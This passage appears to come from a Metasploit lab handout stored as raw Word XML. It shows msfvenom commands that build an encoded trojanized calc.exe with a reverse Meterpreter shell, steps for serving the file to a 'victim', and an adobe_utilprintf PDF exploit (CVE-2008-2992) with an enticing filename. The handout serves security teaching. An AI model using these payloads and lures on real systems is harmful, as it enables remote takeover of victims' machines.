    <w:p w14:paraId="3D5275BD" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7B96CC"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#4.3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> This time suppose you want to send the victim a well known executable file, let’s say “calc.exe”. So what we need to do is copy this file from our Windows box to our Kali box then use this time an encoder to add our malicious actions to the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6354E05B" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0148876A" w14:textId="77777777" w:rsidR="00CE46EA" w:rsidRDefault="00CE46EA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2FF181" w14:textId="35831850" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This second malicious file we will create is a “calc.exe” with a reverse Meterpreter, which can be done like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C50B1AA" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
        <w:t>$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
        <w:t>&lt;YOUR_IP_ADDRESS&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=5555 -f exe -e x86/shikata_ga_nai -i 3 -x /root/calc.exe -o calc-trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBC8B65" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123C63DB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now copy the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>calc-trojan.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">” file to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/var/www/files/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, and goto your victim’s machine and browse to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://&lt;ip-address-of-kali-box&gt;/files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and download the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>calc-trojan.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>” file (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t>Please make sure you re-executed your multi-handler before you proceed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>) and double click on it to execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CF8AF2" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02123D36" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Check your Multi Handler, what happened?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C2E52F" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDF0822" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A47B27A"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#4.4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> This time we want the “calc.exe” to be executed after the victim double clicks on it, so he/she doesn’t be suspicious about the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B96E004" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="261CD04C" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>So our third malicious file we will create is a “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>calc.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>”, also with a reverse Meterpreter, which can be done like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6FBB17" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="C9DAF8"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>&lt;YOUR_IP_ADDRESS&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=5555 -f exe -e x86/shikata_ga_nai -i 3 -x /root/calc.exe -o calc-trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B694622" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B46BF4" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now copy the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>calc-trojan2.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">” file to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/var/www/files/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, and goto your victim’s machine and browse to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://&lt;ip-address-of-kali-box&gt;/files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and download the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>calc-trojan2.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>” file (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t>Please make sure you re-executed your multi-handler before you proceed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>) and double click on it to execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649E552B" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2936312F" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now did the calc.exe work? And what about the Multi Handler, what happened?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F099465" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8EA2A2" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="740206AD"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#4.5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> This time we will be using CVE2008-2992, which affects </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
          </w:rPr>
          <w:t>adobe acrobat reader 8.1.2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>. You can use Google to search for “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>CVE-2008-2992 site:securityfocus.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve">”. This search returns the following page: http://www.securityfocus.com/bid/30035. After reading the vulnerability disclosure bulletin, we discover that the vulnerability involves the util.printf() javascript function used by adobe's acrobat reader. A copy for this lab could be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC71549" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C883D81" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Open a new terminal and start your “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>”. Search for the exploit affecting adobe and print util as the CVE article stated:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC493E" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>search adobe_utilprint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69829F05" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531B784E" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now select the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE31AFB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>use exploit/windows/fileformat/adobe_utilprintf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268EF670" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5590E5B4" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the Meterpreter payload as our malicious payload to embed into our PDF file. This is the payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>that is executed on the victim's machine when he/she opens the file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C8FB04" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63528D03" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F88DA5" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Also set the FILENAME to a fancy name that will attract the victim to open it. This can be done:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5EDFD1" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="CFE2F3"/>
        </w:rPr>
        <w:t>set FILENAME GrayHatHacking.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD058D" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="128AEE02" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D978E6" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Now copy the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
